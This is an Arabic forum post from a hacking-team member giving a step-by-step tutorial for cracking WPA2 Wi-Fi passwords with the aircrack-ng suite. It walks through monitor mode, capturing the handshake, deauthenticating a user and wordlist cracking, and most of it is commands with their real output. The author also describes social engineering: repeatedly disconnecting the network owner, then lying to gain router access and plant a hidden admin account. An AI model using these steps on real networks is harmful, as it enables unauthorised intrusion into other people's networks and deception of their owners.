الموضوع: يا اخ HaNGaw Kurd!$tanY
عرض مشاركة واحدة
قديم 01-18-2011, 03:25 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
HaNGaw Kurd!$tanY
 
الصورة الرمزية HaNGaw Kurd!$tanY
 

 

 
إحصائية العضو







HaNGaw Kurd!$tanY غير متواجد حالياً

إرسال رسالة عبر MSN إلى HaNGaw Kurd!$tanY إرسال رسالة عبر Yahoo إلى HaNGaw Kurd!$tanY

 

 

إحصائية الترشيح

عدد النقاط : 10
HaNGaw Kurd!$tanY is on a distinguished road

افتراضي


[align=center]يا اخي حمل نسخة iso و هذ***1749; شرح لل اخ BlaCkHat
کيف كيفية تنصيب الباك تراك 4 على النظام الوهمي virtual box

how to install Backtrack on virtual box

و بعدين

أولا يجب معرفة اسم كرت النت وورك الهوائي الموجود عندك ولمعرفه ذلك تكتب في الشيل
iwconfig
اللي مكتوب بجنبه
no wireless extensions.
يعني مش كرت وايرلس
اما المكتوب بجنبه مثل هالكلام

كود:
wlan0     IEEE 802.11bg  ESSID:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

عندي اسمه wlan0 قد يكون عند الغير eth1 او حسب اسمه
يكون هو الكرت .. قد نجد أكثر من واحد .. لأن الشخص ممكن يكون عنده أكثر من كرت بجهازه هو مركبهم ..
ولمستخدمي اللابتوبات .. أكيد يوجد كرت هوائي .. ولمعرف اسمه نفعل مثل فوق
الأن عرفنا اسم الكرت الهوائي ..
أول شي نشغل الكرت على المونيتور .. يعني المراقبة
airmon-ng start wlan0

قد يشتغل المونيتور ليس على نفس الإسم

كود:
root@bt:~# airmon-ng start wlan0


Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]air
                                (monitor mode enabled on mon0)

كما قال هنا أنه تم تفعيل المراقبة على اسم
mon0
هنا كل واحد لازم يعرف
وأنا سأكمل حسب الموجود عندي
بعد هذا .. وأهم شيئ .. هو أن يكون الكرت عندك يدعم الحقن .. يعني يحقن باكيتس
وهو ضروري جدا .. ولمعرف ذلك أكتب


بعدين
airodump-ng mon0
حتى نشوف الراوترات المحيطة بنا

كود:
 CH  8 ][ Elapsed: 12 s ][ 2010-03-12 10:39

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1F:9F:D3:1F:EB  -48       24        0    0   1  54   WPA2 CCMP   PSK  ThomsonE2A46B

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:1F:9F:D3:1F:EB  00:13:CE:4F:B5:51  -49    0 -24     38       20  ThomsonE2A46B

الأن كما نلاحظ أن نوع الحمايه هو wpa2 psk
pre shared key
يعني لازم يتم فصل مستخدم حتى نحصل على ملف الكاب لنكسره فيما بعد
والمهم للكسر هو معرفة القناة
CH .. channel اللي شغالة عليها الراوتر
هنا هي القناة 1
كم نلاحظ تحت CH
وأهم شي .. هو الماك أدريس للراوتر وللمستخدم
الان نوقف المراقبة على أسماء الكروت .. (يمكننا أن نعمل مراقبة ,, لكن رح يطلع اسم كرت غير .. حست نوعية الكرت .. وهو هل حديث .. لأنه بهالحالة يقدم خصائص متميزة)
المهم سأشرح الأسهل والموجود عند الجميع

كود:
airmon-ng stop mon0
airmon-ng stop wlan0

root@bt:~# airmon-ng stop mon0


Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
mon0            Atheros         ath5k - [phy0] (removed)

root@bt:~# airmon-ng stop wlan0


Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode disabled)

هكذا نكون وقفنا المراقبة
الأن نعيد تشغيلها لكن على القناة الخاصة بالراوتر اللي يجب أن نكسرهاوهي هنا رقم 1

كود:
airmon-ng start wlan0 1

root@bt:~# airmon-ng start wlan0 1


Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode enabled on mon0)

اخبرنا أن المراقبة شغالة على mon0


بعد هذا .. وأهم شيئ .. هو أن يكون الكرت عندك يدعم الحقن .. يعني يحقن باكيتس
وهو ضروري جدا .. ولمعرف ذلك أكتب

كود:
aireplay-ng -9 -e ThomsonE2A46B -a 00:1F:9F:D3:1F:EB mon0

-9 لمعرفة إذا يدعم الحقن
-e وبعدها اسم الراوتر
-a وبعدها الماك ادريس للراوتر
mon0 اسم الكرت اللي شغلنا المراقبة عليه

نلاحظ شو يطلعلنا

كود:
11:10:48  Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 1
11:10:48  Trying broadcast probe requests...
11:10:48  Injection is working!
11:10:49  Found 1 AP

11:10:49  Trying directed probe requests...
11:10:49  00:1F:9F:D3:1F:EB - channel: 1 - 'ThomsonE2A46B'
11:10:49  Ping (min/avg/max): 1.249ms/3.204ms/6.293ms Power: -41.93
11:10:49  30/30: 100%

نلاحظ
11:10:48 Injection is working!
11:10:49 30/30: 100%
يعني كل شي شغال وتمام
ملاحظة .. يجب أن تكون قريب كفاية من الراوتر ..او عندك مقـوي اشارة


الأن لمراقبة الراوتر ومستخدميها نكتب

كود:
airodump-ng -c 1 --bssid 00:1F:9F:D3:1F:EB -w ttt mon0
-c 1 يعني القناة 1 وهي الموجود عليها الراوتر
--bssid وبعدها الماك أدريس للراوتر
-w وبعدها اسم الملف الذي سيخرج للحصول على شبك وهاند شيك
mon0 اسم الكرت اللي تم عليه المراقبة
نلاحظ

كود:
CH  1 ][ Elapsed: 1 min ][ 2010-03-12 10:50

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1F:9F:D3:1F:EB  -44 100     1120       35    0   1  54   WPA2 CCMP   PSK  ThomsonE2A46B

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:1F:9F:D3:1F:EB  00:13:CE:4F:B5:51  -47    1 -36      0      785
الأن المراقبة شغالة .. وأذكر انه مهم ان يظهر على اليمين في الأعلي
handshake
الأن للحصول على هاند شيك يجب فصل المستخدم على الراوتر
فنستخدم هذا الأمرفي شاشة شيل تانية


كود:
aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0

-0 لعمل deauthentication والرقم 1 هو يعني مرة واحدة .. اننا سنفصل مرة واحدة
(ملاحظة .. يمكننا استخدام الهندسة الإجتماعية ان لم ننجح بمعرفة كلمة السر .. وهو ان نفصل حوالي مليون مرة .. ونقول لصاحب الشكبة اننا نعرف الحل ويمكننا المساعده .. لكن يجب معرفة كلمة السر والدخول للراوتر ومن هالحكي الكذب ههه
هو يوثق فينا .. وعندها ندخل للراوتر .. نضيف مستخدم دخول مع كلمة سر خاصة به ونغير اللي بدنا اياه هههه .. طريقة نافعه .. ونجحت معي )

-a الماك أدريس للراوتر
-c الماك أدريس للمستخدم اللي نريد فصله
mon0 اسم الكرت اللي نراقب عليه ..
نلاحظ شو يطلعلنا

كود:
root@bt:~# aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0
10:56:20  Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 1
10:56:21  Sending 64 directed DeAuth. STMAC: [00:13:CE:4F:B5:51] [16|66 ACKs]

بعد تطبيق الأمر .. نكون فصلنا مستخدم وقطعنا عنه الإتصال ثم عاد ودخل ونكون نحن حصلنا على ملف الكاب اللي فيه كلمة السر ويجب تخمينها ..

كود:
 CH  1 ][ Elapsed: 6 mins ][ 2010-03-12 10:57 ][ WPA handshake: 00:1F:9F:D3:1F:EB

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1F:9F:D3:1F:EB  -44 100     4060      115    2   1  54   WPA2 CCMP   PSK  ThomsonE2A46B

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:1F:9F:D3:1F:EB  00:13:CE:4F:B5:51  -42   54 - 2      0     2976

نلاحظ على اليمين في الأعلى
WPA handshake: 00:1F:9F:D3:1F:EB
وهي مهمة .. وتعني أنه تم الفصل

الأن حصلنا على ملف الكاب .. ويمكننا أنو نوقف المراقبة الأن
يعني نوقف ال
airodump-ng
ما عدنا محتاجينها
الأن جاء الدور المهم وهو تخمين كلمة السر(أقول تخمين لأن هذه الحماية بدها تخمين .. مش متل الويب نجمع باكيتس ونكسرهم)

نستخدم الأن ونكتب

كود:
aircrack-ng -w passowrds.lst -b 00:1F:9F:D3:1F:EB tt*.cap

-w بعدها مكان وجود ملف الباسووردات
-b الماك أدريس للراوتر
tt*.cap هو اسم ملف الكاب

وهنا أعود وأذكر أنه نحن الأن نخمن كلمة السر من ملف فيه باسووردات كثيرة
بمعنى أخر أنه يجب ان تكون كلمة السر موجودة داخل الملف حتى يتم اكتشافها .. وهنا تعتمد على مدى قوة وكبر ملف الباسووردات

وسأنفذ الأمر عندي

كود:
aircrack-ng -w /pentest/passwords/wordlists/bt4-password.txt -b 00:1F:9F:D3:1F:EB tt*.cap

ونلاحظ أنه تم معرفة كلمة السر

كود:
Aircrack-ng 1.0 r1668


                   [00:00:00] 12 keys tested (235.19 k/s)


                          KEY FOUND! [ alaa123123 ]


      Master Key     : B1 67 C3 CE 94 25 20 85 7F EC E6 16 30 8E 61 26
                       4A 36 6D A6 0A 22 43 19 79 E4 09 A7 6C 8F 62 A8

      Transient Key  : E8 52 16 BB C0 3D 48 E3 C8 D0 90 10 6E 76 68 11
                       FE 6F F6 9D EE 1F AE EF D9 0F 44 0A 4F 11 14 F7
                       1A 47 5E 29 FA 7B CD 5A 81 47 8A EA 0B B1 C3 B9
                       D3 C7 C2 41 73 2A 8B 6A 29 8F C9 AC CF B1 A3 A3

      EAPOL HMAC     : 3F EB 20 C8 BD C5 35 7F F4 1A 42 C2 6B 45 58 44
والكلمة هي
alaa123123


إعادة سريعه ومختصرة

1- aireplay-ng -9 -e ThomsonE2A46B -a 00:1F:9F:D3:1F:EB mon0
لمعرفة هل يدعم الحقن

2- airodump-ng -c 1 --bssid 00:1F:9F:D3:1F:EB -w ttt mon0
لمراقبة الراوتر

3- aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0
لفصل مستخدم

4- aircrack-ng -w passowrds.lst -b 00:1F:9F:D3:1F:EB tt*.cap
لعمل تخمين وإيجاد كلمة السر ..

وبالنهايةاذكر على انه يجب أن تكون كلمة السر موجودة بالملف وإلا لن يجدها لأننا هنا نعتمد على التخمين وليس الكسر

وأرجو أن أكون قد وفقت
[/align]
التوقيع

HaNGaw Kurd!$tanY

Www.KurdHackTeam.Net

لتعارف
Email :
H_K@HaCker.ps
HaNGawKurdistanY@Yahoo.Com

 

   

رد مع اقتباس